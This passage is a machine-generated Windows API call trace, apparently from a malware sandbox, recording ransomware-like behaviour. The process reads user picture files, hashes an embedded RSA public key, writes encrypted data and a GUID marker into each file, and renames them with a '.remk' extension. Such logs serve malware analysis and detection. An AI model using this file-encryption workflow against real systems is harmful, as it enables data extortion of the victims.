flProtect=0x4) returned 0x3c20000 [0234.488] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0x11c6b, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0234.488] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x3adfb78, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb78*=0x26, lpOverlapped=0x0) returned 1 [0234.489] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a58 [0234.489] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a58 | out: hHeap=0x630000) returned 1 [0234.489] SetFilePointer (in: hFile=0x640, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0234.489] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x3adfb70, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb70*=0x11c91, lpOverlapped=0x0) returned 1 [0234.490] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0234.490] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f6) returned 0x325fb40 [0234.490] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0234.490] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0234.490] CryptAcquireContextW (in: phProv=0x3adfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x3adfa50*=0x695278) returned 1 [0234.491] CryptCreateHash (in: hProv=0x695278, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x3adfa58 | out: phHash=0x3adfa58) returned 1 [0234.491] CryptHashData (hHash=0x31de170, pbData=0x325fb40, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0234.491] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x0, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x3adfa54) returned 1 [0234.491] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x11) returned 0x31a0f08 [0234.491] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x31a0f08, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x31a0f08, pdwDataLen=0x3adfa54) returned 1 [0234.491] GetLastError () returned 0x0 [0234.492] CryptDestroyHash (hHash=0x31de170) returned 1 [0234.492] CryptReleaseContext (hProv=0x695278, dwFlags=0x0) returned 1 [0234.492] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325fb40 | out: hHeap=0x630000) returned 1 [0234.492] UuidCreate (in: Uuid=0x3adfa48 | out: Uuid=0x3adfa48) returned 0x0 [0234.492] UuidToStringA (in: Uuid=0x3adfa48, StringUuid=0x3adfa40 | out: StringUuid=0x3adfa40) returned 0x0 [0234.492] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a90 [0234.492] RpcStringFreeA (in: String=0x3adfa40 | out: String=0x3adfa40) returned 0x0 [0234.492] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a58 | out: hHeap=0x630000) returned 1 [0234.492] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a58 [0234.492] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x11c90) returned 0x37c4278 [0234.492] SetFilePointer (in: hFile=0x640, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0234.492] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a90 | out: hHeap=0x630000) returned 1 [0234.492] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x325fb40 [0234.492] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a90 [0234.492] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x325fd48 [0234.492] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x31d6930 [0234.492] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x325c410 [0234.493] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee7d8 [0234.493] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x325c458 [0234.493] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee7f0 [0234.493] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee820 [0234.493] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee880 [0234.493] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee838 [0234.493] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x24) returned 0x31ec670 [0234.493] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x158) returned 0x31f7b30 [0234.493] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x31f7b30, Size=0x218) returned 0x37b1b88 [0234.493] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x558) returned 0x37b5b70 [0234.493] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee820 | out: hHeap=0x630000) returned 1 [0234.493] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee838 | out: hHeap=0x630000) returned 1 [0234.493] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee880 | out: hHeap=0x630000) returned 1 [0234.493] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ec670 | out: hHeap=0x630000) returned 1 [0234.493] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b5b70 | out: hHeap=0x630000) returned 1 [0234.493] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee880 [0234.493] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72ff00 [0234.493] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x31ee838 [0234.493] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x31a0ee8 [0234.493] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x9) returned 0x31ee820 [0234.493] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72fea0 [0234.493] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10e) returned 0x3192918 [0234.493] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0234.493] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x31d6990 [0234.493] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0f08 [0234.494] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x104) returned 0x31f6b30 [0234.494] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0f28 [0234.494] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fee0 [0234.494] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3192918 | out: hHeap=0x630000) returned 1 [0234.494] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee838 | out: hHeap=0x630000) returned 1 [0234.494] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fea0 | out: hHeap=0x630000) returned 1 [0234.494] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee820 | out: hHeap=0x630000) returned 1 [0234.494] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0ee8 | out: hHeap=0x630000) returned 1 [0234.494] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72ff00 | out: hHeap=0x630000) returned 1 [0234.494] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee880 | out: hHeap=0x630000) returned 1 [0234.494] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed738 | out: hHeap=0x630000) returned 1 [0234.494] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31d6930 | out: hHeap=0x630000) returned 1 [0234.494] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b1b88 | out: hHeap=0x630000) returned 1 [0234.494] GetCurrentThreadId () returned 0x314 [0234.494] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x3192918 [0234.494] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x82) returned 0x37c3520 [0234.494] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x2c) returned 0x31a8ac8 [0234.494] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x695278 [0234.494] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x148) returned 0x37bddc8 [0234.494] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72ff00 [0234.494] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fea0 [0234.494] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x65dd10 [0234.494] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0234.494] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0234.494] GetCurrentThreadId () returned 0x314 [0234.494] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0234.494] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0234.494] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xeb) returned 0x6a7330 [0234.494] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0234.495] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0234.495] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0234.495] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0234.495] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x6a7330 | out: hHeap=0x630000) returned 1 [0234.495] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x6a7330 [0234.495] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72ff00 | out: hHeap=0x630000) returned 1 [0234.495] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4c) returned 0x31b5808 [0234.495] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72ff00 [0234.495] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x3195950 [0234.495] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fec0 [0234.495] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee880 [0234.495] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fec0 | out: hHeap=0x630000) returned 1 [0234.495] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fec0 [0234.495] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72feb0 [0234.495] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x68ed18 [0234.495] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x68ed28 [0234.495] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f758 [0234.495] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f768 [0234.495] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f778 [0234.495] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee820 [0234.495] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72feb0 | out: hHeap=0x630000) returned 1 [0234.495] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72feb0 [0234.495] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fec0 | out: hHeap=0x630000) returned 1 [0234.495] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fec0 [0234.495] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f788 [0234.495] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f798 [0234.495] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f7a8 [0234.495] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee838 [0234.496] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f798 | out: hHeap=0x630000) returned 1 [0234.496] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0ee8 [0234.496] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f788 | out: hHeap=0x630000) returned 1 [0234.496] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee808 [0234.496] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f7a8 | out: hHeap=0x630000) returned 1 [0234.496] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee898 [0234.496] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fec0 | out: hHeap=0x630000) returned 1 [0234.496] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72fec0 [0234.496] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f768 | out: hHeap=0x630000) returned 1 [0234.496] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee868 [0234.496] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fec0 | out: hHeap=0x630000) returned 1 [0234.496] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee850 [0234.496] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x68ed18 | out: hHeap=0x630000) returned 1 [0234.496] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x31ee8b0 [0234.496] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee850 | out: hHeap=0x630000) returned 1 [0234.496] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x31ee850 [0234.496] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee868 | out: hHeap=0x630000) returned 1 [0234.496] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x68ed18 [0234.496] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72ff00 | out: hHeap=0x630000) returned 1 [0234.496] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0ea8 [0234.496] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x68ed18 | out: hHeap=0x630000) returned 1 [0234.496] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x31a0ec8 [0234.496] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee820 | out: hHeap=0x630000) returned 1 [0234.496] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee820 [0234.496] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72feb0 | out: hHeap=0x630000) returned 1 [0234.496] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x204) returned 0x37c0db8 [0234.496] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee880 | out: hHeap=0x630000) returned 1 [0234.496] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x31f6c48 [0234.497] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee8b0 | out: hHeap=0x630000) returned 1 [0234.497] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x210) returned 0x37c0fc8 [0234.497] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0ec8 | out: hHeap=0x630000) returned 1 [0234.497] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10c) returned 0x72aea0 [0234.497] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x68ed28 | out: hHeap=0x630000) returned 1 [0234.497] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x31f6d60 [0234.497] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee820 | out: hHeap=0x630000) returned 1 [0234.497] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x37b5b70 [0234.497] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31f6c48 | out: hHeap=0x630000) returned 1 [0234.497] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x319bc40 [0234.497] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fea0 | out: hHeap=0x630000) returned 1 [0234.497] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x695278 | out: hHeap=0x630000) returned 1 [0234.497] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x6a7330 | out: hHeap=0x630000) returned 1 [0234.497] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x319bc40 | out: hHeap=0x630000) returned 1 [0234.497] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0ea8 | out: hHeap=0x630000) returned 1 [0234.497] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31f6d60 | out: hHeap=0x630000) returned 1 [0234.497] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37c0fc8 | out: hHeap=0x630000) returned 1 [0234.497] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b5b70 | out: hHeap=0x630000) returned 1 [0234.497] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72aea0 | out: hHeap=0x630000) returned 1 [0234.498] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0x11c91, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0234.498] WriteFile (in: hFile=0x640, lpBuffer=0x3192918*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x3192918*, lpNumberOfBytesWritten=0x3adfb50*=0x100, lpOverlapped=0x0) returned 1 [0234.498] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0234.498] WriteFile (in: hFile=0x640, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x3adfb50*=0x26, lpOverlapped=0x0) returned 1 [0234.498] CloseHandle (hObject=0x640) returned 1 [0234.502] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x90) returned 0x65e698 [0234.502] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8a0) returned 0x325d3b0 [0234.503] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_dqq7i08G7zkmy4eWB\\I1U5Uwz D.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\_dqq7i08g7zkmy4ewb\\i1u5uwz d.jpg"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_dqq7i08G7zkmy4eWB\\I1U5Uwz D.jpg.remk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\_dqq7i08g7zkmy4ewb\\i1u5uwz d.jpg.remk")) returned 1 [0234.504] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x96c92930, ftCreationTime.dwHighDateTime=0x1d5e42b, ftLastAccessTime.dwLowDateTime=0xb798890, ftLastAccessTime.dwHighDateTime=0x1d5d85d, ftLastWriteTime.dwLowDateTime=0xb798890, ftLastWriteTime.dwHighDateTime=0x1d5d85d, nFileSizeHigh=0x0, nFileSizeLow=0xc27b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ivWs qFi.bmp", cAlternateFileName="IVWSQF~1.BMP")) returned 1 [0234.504] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x695278 [0234.505] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xbe) returned 0x31c7810 [0234.505] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_dqq7i08G7zkmy4eWB\\ivWs qFi.bmp") returned=".bmp" [0234.505] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_dqq7i08G7zkmy4eWB\\ivWs qFi.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\_dqq7i08g7zkmy4ewb\\ivws qfi.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x640 [0234.505] GetFileSizeEx (in: hFile=0x640, lpFileSize=0x3adfb40 | out: lpFileSize=0x3adfb40*=49787) returned 1 [0234.505] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3c20000 [0234.507] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0xc255, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0234.507] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x3adfb78, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb78*=0x26, lpOverlapped=0x0) returned 1 [0234.509] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a58 [0234.509] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x3adfb70, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb70*=0xc27b, lpOverlapped=0x0) returned 1 [0234.510] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0234.510] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f6) returned 0x325fb40 [0234.510] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0234.510] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0234.510] CryptAcquireContextW (in: phProv=0x3adfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: 